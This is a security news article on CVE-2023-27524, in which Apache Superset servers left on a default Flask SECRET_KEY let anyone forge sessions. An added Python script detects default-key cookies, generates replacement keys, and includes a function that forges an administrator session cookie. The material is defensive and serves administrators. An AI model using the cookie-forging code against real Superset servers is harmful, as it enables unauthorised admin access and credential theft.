
Common insecure configuration opens Apache Superset servers to compromise
2023-04-26 13:51

An insecure default configuration issue (CVE-2023-27524) makes most internet-facing Apache Superset servers vulnerable to attackers, Horizon3.ai researchers have found.

Administrators in charge of Apache Superset instances should check whether their deployments are among the affected ones, upgrade them to a fixed version, and check whether attackers might already have exploited the weakness to breach them.

Apache Superset is an open-source data exploration and visualization platform that is usually connected to a variety of databases, which is what makes a takeover of the Superset server so consequential.

The researchers wrote:

"We found reliable paths to remote code execution across different Superset versions in a variety of configurations. Remote code execution is possible both on databases connected to Superset and the Superset server itself. We also found a host of methods for harvesting credentials. These credentials include Superset user password hashes and database credentials, both in plaintext and in a reversible format."

The root cause is the Flask SECRET_KEY that Superset uses to sign session cookies: an installation left on the default value lets anyone who knows that value forge a valid session for any user, including an administrator. The researchers reported the issue to the Apache Superset team in October 2021, and the team addressed it by changing the default SECRET_KEY and adding a warning to users about the necessity of replacing it with a random, complex one.

The warning went unheeded by many: the researchers recently swept the internet with Shodan to see how many Apache Superset setups are exposed with this insecure configuration, and found that roughly two-thirds of the instances they could reach were still running with a default key.
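The check administrators are advised to run, and the reason a default key is fatal, can both be shown offline. The following is an added example and not code from the article or from the Superset project: it reimplements Flask's session-cookie signing scheme (itsdangerous URLSafeTimedSerializer, salt "cookie-session", HMAC key derivation, SHA-1) with the standard library, tests a cookie against a list of candidate default keys, forges an administrator session when one matches, and generates a proper replacement key. Assumptions: the two strings in DEFAULT_KEYS are illustrative placeholders standing in for the full list of default values a real check would carry, and the session payload `{"_user_id": "1", "user_id": "1"}` is the assumed shape of a Flask-Login session for the first (admin) user.

```python
"""Detect a Flask-style session cookie signed with a known default SECRET_KEY.

Added example (not Superset's or Horizon3's code). Mirrors Flask's session
signing: payload.timestamp.signature, each part urlsafe-base64 without
padding, signature = HMAC-SHA1(HMAC-SHA1(secret, "cookie-session"), data).
"""
import base64
import hashlib
import hmac
import json
import secrets
import time
import zlib
from typing import Optional

SALT = b"cookie-session"

# ASSUMPTION: illustrative candidates. A real check should carry every
# default/placeholder value that has shipped in Superset's config templates.
DEFAULT_KEYS = [
    "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",
    "thisISaSECRET_1234",
]


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _derive_key(secret: str) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC(secret, salt)
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()


def sign_session(secret: str, data: dict, ts: Optional[int] = None) -> str:
    """Produce a cookie exactly as a Flask app with this SECRET_KEY would."""
    payload = json.dumps(data, separators=(",", ":")).encode()
    ts = int(time.time()) if ts is None else ts
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    signed_part = f"{_b64e(payload)}.{_b64e(ts_bytes)}"
    sig = hmac.new(_derive_key(secret), signed_part.encode(), hashlib.sha1).digest()
    return f"{signed_part}.{_b64e(sig)}"


def unsign_session(cookie: str, secret: str, max_age: Optional[int] = None) -> Optional[dict]:
    """Return the session dict if the cookie validates under `secret`, else None."""
    try:
        # rsplit: a zlib-compressed payload is prefixed with "." by itsdangerous
        payload_b64, ts_b64, sig_b64 = cookie.rsplit(".", 2)
        signed_part = f"{payload_b64}.{ts_b64}"
        expected = hmac.new(_derive_key(secret), signed_part.encode(), hashlib.sha1).digest()
        if not hmac.compare_digest(expected, _b64d(sig_b64)):
            return None
        if max_age is not None:
            ts = int.from_bytes(_b64d(ts_b64), "big")
            if time.time() - ts > max_age:
                return None
        if payload_b64.startswith("."):
            raw = zlib.decompress(_b64d(payload_b64[1:]))
        else:
            raw = _b64d(payload_b64)
        return json.loads(raw)
    except (ValueError, zlib.error):  # covers binascii.Error and JSONDecodeError
        return None


def find_default_key(cookie: str, candidates=DEFAULT_KEYS) -> Optional[str]:
    """The administrator's check: which default key, if any, signed this cookie?"""
    for key in candidates:
        if unsign_session(cookie, key) is not None:
            return key
    return None


def forge_admin_cookie(secret: str) -> str:
    """What an attacker does once the key is known (user id 1 assumed to be admin)."""
    return sign_session(secret, {"_user_id": "1", "user_id": "1"})


def generate_secret_key() -> str:
    """Replacement key with the entropy of 'openssl rand -base64 42'."""
    return base64.b64encode(secrets.token_bytes(42)).decode("ascii")


if __name__ == "__main__":
    weak = DEFAULT_KEYS[0]
    # Constructed sample: a cookie an unpatched, default-key instance would issue
    issued = sign_session(weak, {"_user_id": "7"})
    print("default key in use:", find_default_key(issued))
    print("forged admin session validates:", unsign_session(forge_admin_cookie(weak), weak))
    strong = generate_secret_key()
    print("strong key flagged as default:", find_default_key(sign_session(strong, {"_user_id": "7"})))
```

In practice the cookie to test is the one the server sets on an unauthenticated request to the login page; if `find_default_key` returns a value, the instance needs a new SECRET_KEY (set from the environment rather than hard-coded) and, because every existing session can have been forged, a review of the audit logs for unexpected admin activity.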


News URL

https://www.helpnetsecurity.com/2023/04/26/apache-superset-insecure-configuration-cve-2023-27524/
